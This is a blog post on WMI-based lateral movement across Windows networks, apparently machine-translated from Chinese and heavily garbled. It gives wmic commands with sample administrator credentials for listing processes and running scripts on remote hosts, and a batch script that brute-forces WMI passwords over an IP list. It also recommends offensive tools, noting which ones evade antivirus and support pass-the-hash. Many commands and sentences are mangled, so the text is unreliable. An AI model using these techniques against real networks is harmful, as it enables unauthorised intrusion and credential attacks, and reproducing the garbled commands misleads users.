Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86387152

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

基于WMI的侧向运动

WMI简介

WMI的全名是Windows Management仪器。它出现在所有Windows操作系统中,并由一组强大的工具组成,用于管理本地或远程Windows系统。攻击者使用WMI攻击,但是Windows系统默认情况下不会在日志中记录这些操作。它可以是无木的。攻击脚本不需要写入磁盘,这会增加隐藏。建议使用WMIC远程执行命令。

WMI利用条件

远程服务器启动Windows Management Instrumentation服务(默认为ON)

端口135未过滤[如果在默认配置下启用了目标主机防火墙,则不会连接防火墙]

连接失败常见错误编号:

1234567891111213141516171819202121。允许共享异常错误:代码=0x800706BA描述=RPC服务器不可用。设备=Win322。错误:当组策略封锁indurandIvestraotr远程访问=0x80070005描述=访问被拒绝。设备=Win323.IP安全策略块135错误:代码=0x800706BA描述=RPC服务器不可用。设备=Win324。错误:禁用Winmgmt Service=0x80070422描述=无法启动服务时代码,因为它可能被禁用或与之关联的设备未启动。设备=Win325。 Wbem directory permission is denied, wmic cannot be used.

使用WMIC进行水平运动

通用系统带有命令

123456781. List remote host process wmic /node:192.168.1.1 /user:192.168.1.1\administrator /password:00!@#123QWE process list brief2.执行BAT脚本WMIC /NODE:192.168.1 /user:192.168.1.1.1 \administrator /passwork:0!@#123QWe Process Calles CALTER CALLE CALLE CALCE CALES CARTE CREATE C: \ PROGRAMDATA \ PROGRAMDATA \ TEST.BAT33。在远程系统WMIC /NODE:192.168.1 /user:192.168.1.1.1 \administrator /password:0上执行单个命令https://www.cnblogs.com/0xdd/p/11393392.html

批处理爆炸

练习后,WMI的爆炸将有3个以上的错误。 360将拦截[没有软杀时,没有测试],日志是远程RDP爆炸,WMI的连接将受到临时限制。

※以下是一个密码爆炸。如果需要爆炸多个密码爆炸,则可以根据IPC侧面的文章水平移动它来对其进行修改。

点点:请注意特殊字符,例如密码中的%需要使用%示例:123#$%应该转换为123#$ %%

1234567891011@echo ofcho offclsecho useage:%0 ip.txtfor /f %% i in(%1)do(echo wmic /node: %% i /user:'%% i \ indersantor' /user:'%% i \管理员' /password:'123456'进程列表简短2nulif errorLevel==0(echo Success: %% i pic.txt)echo end.txt End.txt

使用工具

-1

wmiexec.vbs

Impacket-wmiexec

尚未测试

wmiexec.vbs是一种开发的工具,旨在解决WMIC无法回声命令的工具。原理是首先将数据保存在临时文件中,并在每次读取执行结果后自动删除数据。它可用于回声“执行命令”的结果并获得“半相互作用壳”。

1cscript wmiexec.vbs /cmd 192.168.1.1管理员测试@123 Whoami

SharpWmi

优点:支持PTH

缺点:它需要调用WMI服务,占据目标的445、135和另一个随机端口。

使用参考:域渗透——通过哈希实现(3Gstudent.github.io)

SharpWmi(修改版本)

这是一种基于端口135水平移动的工具。它具有执行命令和上传文件的功能。它通过WMI执行命令,并通过呼叫传输数据。

优点:仅依靠端口135,而不依靠港口139和港口445

缺点:当前,仅支持将文件上传到512kb以下,因为重置每个值的长度不能超过512kb。执行命令和上传文件都取决于PowerShell(由360拦截)https://github.com/qax-a-team/sharpwmi

Wmihacker(推荐)

https://github.com/idiotc4t/sharpwmi

这是一种基于端口135的水平移动的工具。它具有执行命令和上传文件的功能。它通过WMI执行命令,并通过注册表传输数据。

拉登

水平穿透的远程命令执行是创建服务或调用win32_process.create excution命令。这些方法已被SWSW.CKER水平运动测试工具100%截获。 (仅依靠端口135,不依靠端口139和港口445)

重要:支持PTH-https://github.com/360-linton-lab/wmihacker/issues/1

主函数:1。命令执行; 2。文件上传; 3。文件下载

https://github.com/360-linton-lab/wmihacker

Sharp-Wmiexec

模块功能

目标端口

目标系统

用法教程

WMI爆炸

港口135

视窗

http://K8GE.org/ladon/wmiscan.html

WMI-NTLMHASH爆炸

港口135

视窗

http://k8ge.org/ladon/wmihashscan.html

Wmiexec(推荐)

港口135

视窗

仅端口135在注册表中回荡,侵袭者或其他也依赖445的工具,并且不依赖PowerShell,适合任何目标

Wmiexec2

港口135

视窗

像Wmiexec一样,通过注册表回声仅需要端口135,但是依靠PowerShell,没有PowerShell的目标可能不适用。

WMICMD

未使用,尚未测试

https://github.com/checkymander/sharp-wmiexec

010-1010未使用,尚未测试

https://github.com/nccgroup/wmicmd